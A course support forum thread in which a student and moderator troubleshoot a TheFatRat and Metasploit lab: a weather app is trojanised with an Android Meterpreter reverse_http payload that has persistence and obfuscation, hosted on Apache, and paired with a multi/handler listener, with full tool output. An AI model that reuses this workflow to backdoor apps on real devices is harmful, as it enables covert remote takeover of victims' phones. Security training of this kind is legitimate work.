Viewing 12 posts - 1 through 12 (of 12 total)
  • Author
    Posts
  • #72800
    buystuff1234
    Participant

    Hello,
    I get this error message when in fatrat trying to create the apk. I follow the instructions from the course. But maybe the issue has to do with the part that when run ´update-alternatives –config java´ i get as options javaversion 17 and java 11, i tried them both, but receive the same error. So not able to choose version 8 as the course says.
    Thank you in advance

    #72803
    Diego PérezDiego Pérez
    Moderator

    Hi!
    The image wasn’t uploaded, can you try it again?

    Greetings!
    Diego

    #72814
    buystuff1234
    Participant

    Hey Diego,

    Here is the screenshot, but also i tried a different application instead the flappy bird from the course. When i used angry birds it completed the apk succesfully. And i follow all the following steps. Moving it to my /var/www/html/evil-files/ and setting up a new listener on metasploit. Using exploit/multi/handler/, Setting payload /android/meterpreter/reverse_http (tried tcp as well) setting lhost to my ip adress and setting lport 8080 (tried 4444 also).
    Then exploit to listen to new incoming agents
    Running apache2 and using an android phone to download the application. Which all goes without issues, i download and install the application from the apache server but i dont get the meterpreter session. What am i missing?

    #72825
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Unfortunately the images are not uploading, maybe upload them to google drive and share the link here.
    Also, for this attack to work you need a wireless adapter, do you have one?
    Make sure that you’re using the same payload when generating the backdoor and when using multi handler, if you’re already doing that then try using a different port, if you’re still having issues then please show me the following please:
    1. Result of ​ifconfig and route -n ​in Kali.
    2. The ip of the phone.
    3. The ​options used for generating the backdoor fatrat.
    4. T​he result of ​show options ​before running the multi handler.​

    Let me know.
    Diego

    #73124
    buystuff1234
    Participant

    Hello Diego,

    Why do i need to use a wireless adapter? The course says nothing about a wireless adapter.
    Here the course tells you to create a malicious apkfile and then place it in your evil-files on your apache server.
    And downloading it with a android device that is connected to the same network. I have a wireless adapter if needed.
    Im failing to get the meterpreter session.

    #73130
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Well, you need a wireless adapter because a mobile phone can’t connect to the virtual network created by VMware hence we need to connect kali to the real network and that’s the use of the wireless adapter. So, connect the adapter to the network and create a malicious APK using the ip of the wireless adapter interface (usually wlan0) as LHOST.

    Greetings!
    Diego

    #73225
    buystuff1234
    Participant

    Hello Diego,

    I did what you said, used the wlan0 ip adress to create the apk. but still didnt get a meterpreter session. i also tried lport 4444, but without result.
    Any ideas what i could do different?
    Thanks

    #73229
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Make sure that you’re using the same payload when generating the backdoor and when using multi handler, if you’re already doing that then try using a different port, if you’re still having issues then please show me the following please:
    1. Result of ​ifconfig and route -n ​in Kali.
    2. ip of the device.
    3. The result of ​options ​before generating the malicious APK.
    4. T​he result of ​show options ​before running the multi handler.​

    Let me know.
    Diego

    #73239
    buystuff1234
    Participant

    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
    inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
    ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
    RX packets 4825 bytes 2941520 (2.8 MiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 5780 bytes 891394 (870.5 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    inet6 ::1 prefixlen 128 scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 1004 bytes 106816 (104.3 KiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 1004 bytes 106816 (104.3 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
    inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
    inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
    inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
    unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
    RX packets 3229 bytes 1507100 (1.4 MiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 4378 bytes 445050 (434.6 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
    inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
    inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
    ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
    RX packets 292 bytes 173648 (169.5 KiB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 18 bytes 2738 (2.6 KiB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    oot@kali:~# route -n
    Kernel IP routing table
    Destination Gateway Genmask Flags Metric Ref Use Iface
    0.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
    0.0.0.0 192.168.100.1 0.0.0.0 UG 100 0 0 eth0
    0.0.0.0 192.168.100.1 0.0.0.0 UG 600 0 0 wlan0
    10.8.0.0 0.0.0.0 255.255.0.0 U 0 0 0 tun0
    128.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
    185.213.154.134 192.168.100.1 255.255.255.255 UGH 0 0 0 eth0
    192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
    192.168.100.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
    root@kali:~#

    IP device: 192.168.100.129

    [ ]===========================================================================[ ]
    [ ] [ ]
    [ ] ) ( ) ) ( ( ) [ ]
    [ ] ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( [ ]
    [ ] )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) [ ]
    [ ] ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( [ ]
    [ ] (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ [ ]
    [ ] | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|[ ]
    [ ] | _ \ / _ \ | (__ ‘ < | |) || (_) || (_) || / | | | .` | | (_ |[ ]
    [ ] |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|[ ]
    [ ]===========================================================================[ ]
    [ ] Embed a Metasploit Payload in an original .apk files [ ]
    [ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
    [ ]===========================================================================[ ]

    Cleaning Temp files
    Done!

    Your local IPV4 address is : 192.168.100.106
    Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
    Your public IP address is :
    Your Hostname is :

    Set LHOST IP: 192.168.100.106

    Set LPORT: 8080

    Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

    Path : /root/Downloads/buienradar.apk

    Testing your apk before next step …
    +——————————————-+
    | [ 1 ] android/meterpreter/reverse_http |
    | [ 2 ] android/meterpreter/reverse_https |
    | [ 3 ] android/meterpreter/reverse_tcp |
    | [ 4 ] android/shell/reverse_http |
    | [ 5 ] android/shell/reverse_https |
    | [ 6 ] android/shell/reverse_tcp |
    +——————————————-+

    Choose Payload : 1

    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
    +————————————-+
    | [ 1 ] Use Backdoor-apk 0.2.4a |
    | [ 2 ] Use old Fatrat method |
    | [ 3 ] Use MsfVenom Embedded method |
    +————————————-+

    Select Tool to create apk : 1

    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
    Generate Backdoor
    +————++————————-++———————–+
    | Name || Descript || Your Input
    +————++————————-++———————–+
    | LHOST || The Listen Addres || 192.168.100.106
    | LPORT || The Listen Ports || 8080
    | OUTPUTNAME || The Filename output || app_backdoor.apk
    | PAYLOAD || Payload To Be Used || android/meterpreter/reverse_http
    +————++————————-++———————–+

    ________
    / ______ \
    || _ _ ||
    ||| || ||| AAAAAA PPPPPPP KKK KKK
    |||_||_||| AAA AAA PPP PPP KKK KKK
    || _ _o|| (o) AAA AAA PPP PPP KKKKKK
    ||| || ||| AAAAAAAA PPPPPPPP KKK KKK
    |||_||_||| AAA AAA PPP KKK KKK
    ||______|| AAA AAA PPP KKK KKK
    /__________\
    ________|__________|__________________________________________
    /____________\
    |____________| Dana James Traversie

    [*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
    [+] Android manifest permission options:
    1) Keep original
    2) Merge with payload and shuffle
    [?] Please select an Android manifest permission option: 2
    [*] Decompiling original APK file…done.
    [*] Locating smali file to hook in original project…done.
    [+] Package where RAT smali files will be injected: com/supportware/Buienradar
    [+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
    [*] Generating RAT APK file…done.
    [*] Decompiling RAT APK file…done.
    [*] Merging permissions of original and payload projects…done.
    [*] Injecting helpful Java classes in RAT APK file…done.
    [*] Creating new directory in original package for RAT smali files…done.
    [+] Inject package path: com/supportware/Buienradar/anvzv
    [+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
    [+] Generated new smali class name for MainService.smali: Omede
    [+] Generated new smali class name for Payload.smali: Xiqlw
    [+] Generated new smali class name for StringObfuscator.smali: Mvtrc
    [+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
    [+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
    [*] Copying RAT smali files to new directories in original project…done.
    [*] Fixing RAT smali files…done.
    [*] Obfuscating const-string values in RAT smali files…Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    done.
    [*] Adding hook in original smali file…done.
    [*] Adding persistence hook in original project…done.
    [*] Recompiling original project with backdoor…done.
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

    Warning:
    The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
    The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

    Warning:
    The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
    The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
    [*] Generating RSA key for signing…done.
    [*] Signing recompiled APK…done.
    [*] Verifying signed artifacts…done.
    [*] Aligning recompiled APK…done.

    [*] Backdoor apk created succefully
    Your RAT apk was successfully builded and signed , it is located here :
    ~/Fatrat_Generated/app_backdoor.apk

    Do you want to create a listener for this configuration
    to use in msfconsole in future ?

    Choose y/n :

    msf6 exploit(multi/handler) > show options

    Module options (exploit/multi/handler):

    Name Current Setting Required Description
    —- ————— ——– ———–

    Payload options (android/meterpreter/reverse_http):

    Name Current Setting Required Description
    —- ————— ——– ———–
    LHOST 192.168.100.106 yes The local listener hostname
    LPORT 8080 yes The local listener port
    LURI no The HTTP Path

    Exploit target:

    Id Name
    — —-
    0 Wildcard Target

    msf6 exploit(multi/handler) >

    #73245
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Cool, are you able to reach kali’s web server from your phone?
    You can also try to use a different payload, try with the tcp one. Or even use a different APK.

    Greetings!
    Diego

    #74512
    Hossam H.I.MHossam H.I.M
    Participant

    Hi diego, am wondering why kali windows 64 bit it became Apple M1 after instillation. Everything was going well until I realized that kali written on it Apple on the program, than when I tried it It won’t work saying that the version is not correct. I delete it and do it again the same, I deleted again with 7 Zip and VMware also same problem plus when I reinstalled 7 Zip and extracted it, it didn’t not extracted like the first time and extracted another files. I troubleshoot the PC and and recovered windows defaults.

    #74530
    Diego PérezDiego Pérez
    Moderator

    HI!
    It seems you are downloading the wrong version, if you are using windows make sure to follow the instructions as in the windows installation lecture and use the exact same link that Zaid points out.

    Greetings!
    Diego

Viewing 12 posts - 1 through 12 (of 12 total)
  • You must be logged in to reply to this topic.